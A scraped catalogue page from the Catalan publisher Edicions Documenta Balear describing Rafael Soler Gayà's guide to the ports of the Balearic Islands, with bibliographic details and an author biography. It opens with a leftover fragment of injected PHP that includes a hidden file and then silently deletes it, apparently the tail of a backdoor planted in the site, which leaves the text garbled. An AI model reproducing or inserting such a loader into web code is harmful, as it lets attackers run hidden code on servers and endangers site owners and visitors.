");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Les illes Balears port a port (rústica)
Cercador d'Obres
ORDENAR:
Començar recerca

Les illes Balears port a port (rústica)

(rústica) i també tapes fortes

Soler Gayà, Rafael

Prologuista:
Schwartz, Fernando
Col·lecció:
Fora de col·lecció
Tema:
Viatges
Pàgines:
236
PVP:
38.00
ISBN:
978-84-96841-15-4
Data d'Edició:
20/12/2007
Sinopsi
Tots els ports de les Balears amb les seves infrastructures, característiques, serveis i llocs d’interès, amb fotografies i plànols a color.
Rafael Soler Gayà
Sant Joan (Mallorca) 1929, és doctor enginyer de camins, canals i ports per la Universitat de Madrid; la seva vida profesional es desenvolupa dins el món del litoral, els fars i els ports, i ocupa diversos càrrecs de reponsabilitat com a director del grup de Ports de Balears, director del Port de Palma, i de la Autoritat Portuària de Balears i director Provincial d’Obres Pùbliques. Ha estat delegat espanyol a la IALA (Internacional Association of Lighthouses Authorities) amb seu a Paris i a la PIANC (Permanent Internacional Association of Navigation Congresses) amb seu a Brussel·les a on formà part de la SPNC (Sport and Pleasure Navigation Commision) al llarg de nou anys. Té nombrosos treballs científics publicats a revistes nacionals i estrangeres sobre la tecnología dels fars i també de la gnomònica o ciencia dels relotges de sol. De les seves publicacions cal destacar, Normas Técnicas sobre Obras e Instalaciones de Ayudas a la Navegación (1986), El Tiempo Verdadero (1988), Diseño y Construcción de Relojes de Sol (1987), El Port de Palma un Temps / El Ayer del Puerto de Palma (1996), participa a 150 Anys d’Obres Públiques a les Illes Balears 1996 i també a Els fars de les Illes Balears, (2001). Els seus darrers títols, Las ayudas a la Navegación Marítima en la Historia (2004), Crónica de los Puertos Baleares, Crònica dels ports balears (2004) publicat a Edicions Documenta Balear, Siglo y medio de la Comisión de Faros (2006) i Las islas Baleares puerto a puerto i Les illes Balears port a port (2007).Recomanar
Comentar
Comentaris (0)